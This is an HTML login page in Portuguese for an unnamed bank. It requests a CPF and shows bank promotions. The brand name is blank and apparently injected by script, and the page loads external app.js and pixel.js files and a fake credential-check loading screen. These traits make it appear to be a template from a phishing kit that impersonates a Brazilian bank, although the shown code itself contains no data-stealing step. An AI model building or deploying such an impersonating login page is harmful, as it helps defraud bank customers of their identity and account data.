<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Banco</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.0/font/bootstrap-icons.css">
    <link rel="stylesheet" href="css/styles.css">
     
    <style>
        #splash-screen {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: #00a651;
            display: flex;
            justify-content: center;
            align-items: center;
            z-index: 9999;
            opacity: 1;
            transition: opacity 0.3s ease-out;
        }
        
        #splash-screen.fade-out {
            opacity: 0;
        }
        
        @keyframes pulse {
            0% {
                transform: scale(1);
            }
            50% {
                transform: scale(1.1);
            }
            100% {
                transform: scale(1);
            }
        }
        
        #splash-logo {
            width: 200px;
            height: auto;
            filter: brightness(0) invert(1);
            animation: pulse 1.5s infinite ease-in-out;
        }
        
        .main-content {
            display: none;
        }
    </style>
</head>
<body>
    <div id="splash-screen">
        <img src="../assets/images/logo.png" alt="Logo" id="splash-logo">
    </div>

    <div class="main-content">
        <header class="bg-primary text-white p-3">
            <div class="container">
                <div class="d-flex justify-content-center">
                    <img src="img/logo.png" alt="Logo" class="logo" width="180">
                </div>
            </div>
        </header>

        <main class="container my-5">
            <div class="row justify-content-center">
                <div class="col-md-6 col-lg-4">
                    <div class="card shadow">
                        <div class="card-body p-4">
                            <h2 class="text-center mb-4">Acesse sua conta</h2>
                            <div class="mb-3">
                                <label for="cpf" class="form-label">CPF</label>
                                <input type="text" class="form-control" id="cpf" placeholder="Digite seu CPF">
                            </div>
                            <button id="btnLogin" class="btn btn-primary w-100"">Acessar</button>
                        </div>
                    </div>
                    
                    <div class="mt-4">
                        <div id="homeCardSlider" class="carousel slide" data-bs-ride="carousel" data-bs-touch="true" data-bs-interval="5000">
                            <div class="carousel-inner">
                                <div class="carousel-item active">
                                    <div class="card home-slider-card shadow">
                                        <img src="img/home/home-slider-1.webp" class="card-img-top" alt="Resultado financeiro">
                                        <div class="card-body">
                                            <h5 class="card-title">Resultado financeiro anual</h5>
                                            <p class="card-text"><span class="marca""></span> registra lucro líquido de 2,3 bilhões em 2024</p>
                                            <div class="text-end mt-3">
                                                <span class="text-primary">Saiba Mais <i class="bi bi-arrow-right"></i></span>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="carousel-item">
                                    <div class="card home-slider-card shadow">
                                        <img src="img/home/home-slider-2.webp" class="card-img-top" alt="Travel Experience">
                                        <div class="card-body">
                                            <h5 class="card-title">Travel Experience</h5>
                                            <p class="card-text">Conheça tudo que nosso serviço de concierge, disponível para clientes tem a oferecer.</p>
                                            <div class="text-end mt-3">
                                                <span class="text-primary">Saiba Mais <i class="bi bi-arrow-right"></i></span>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="carousel-item">
                                    <div class="card home-slider-card shadow">
                                        <img src="img/home/home-slider-3.webp" class="card-img-top" alt="Desconto em restaurantes">
                                        <div class="card-body">
                                            <h5 class="card-title">Desconto em restaurantes</h5>
                                            <p class="card-text">Reservas e descontos em restaurantes do mundo todo</p>
                                            <div class="text-end mt-3">
                                                <span class="text-primary">Saiba Mais <i class="bi bi-arrow-right"></i></span>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="carousel-indicators">
                                <button type="button" data-bs-target="#homeCardSlider" data-bs-slide-to="0" class="active" aria-current="true" aria-label="Slide 1"></button>
                                <button type="button" data-bs-target="#homeCardSlider" data-bs-slide-to="1" aria-label="Slide 2"></button>
                                <button type="button" data-bs-target="#homeCardSlider" data-bs-slide-to="2" aria-label="Slide 3"></button>
                            </div>
                        </div>
                    </div>
                </div>
            </div>

            <div id="loadingScreen" class="loading-screen d-none">
                <div class="loading-content text-center">
                    <img src="img/logo.png" alt="Logo" class="logo-pulse mb-4" width="180">
                    <div class="spinner-border text-primary mb-3" role="status" style="color: #0068ff !important;">
                        <span class="visually-hidden">Carregando...</span>
                    </div>
                    <p id="loadingMessage" class="mt-3">Verificando suas credenciais...</p>
                </div>
            </div>
        </main>

        <footer class="bg-primary text-white p-3 mt-5">
            <div class="container">
                <div class="text-center">
                    <p class="mb-0">&copy; 2025 <span class="marca" style="text-transform: uppercase;"></span>. Todos os direitos reservados.</p>
                    <p class="mb-0 mt-1">CNPJ: 11.317.947/0001-47</p>
                </div>
            </div>
        </footer>
    </div>

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script>
    <script src="js/app.js"></script>
    <script src="../assets/js/pixel.js"></script>
    <script>
        document.addEventListener('DOMContentLoaded', function() {
            const splashScreen = document.getElementById('splash-screen');
            const mainContent = document.querySelector('.main-content');
            
            setTimeout(function() {
                splashScreen.classList.add('fade-out');
                
                setTimeout(function() {
                    splashScreen.style.display = 'none';
                    mainContent.style.display = 'block';
                }, 300);
            }, 2000);
            
            const cpfUsuario = localStorage.getItem('cpfUsuario');
            if (cpfUsuario) {
                const cpfInput = document.getElementById('cpf');
                if (cpfInput) {
                    const cpfFormatado = cpfUsuario.replace(/^(\d{3})(\d{3})(\d{3})(\d{2})$/, "$1.$2.$3-$4");
                    cpfInput.value = cpfFormatado;
                }
            }
        });
    </script>
</body>
</html> 